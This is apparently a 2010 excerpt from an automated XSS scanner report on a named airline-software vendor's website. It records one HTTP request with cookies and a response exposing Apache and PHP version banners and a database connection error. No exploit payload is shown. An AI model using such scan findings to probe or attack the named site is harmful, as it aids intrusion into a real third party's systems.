GET /home/products_services/sabre_reaccommodation_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_reaccommodation_manager/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322305; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A50%3A%22%2Fproducts_services%2Fairline_reservations%2Fecommerce%2F%22%3Bi%3A1%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A2%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A3%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3Bi%3A4%3Bs%3A69%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_maintenance%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 04:02:35 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
Report generated by XSS.CX at Wed Oct 06 08:11:22 EDT 2010.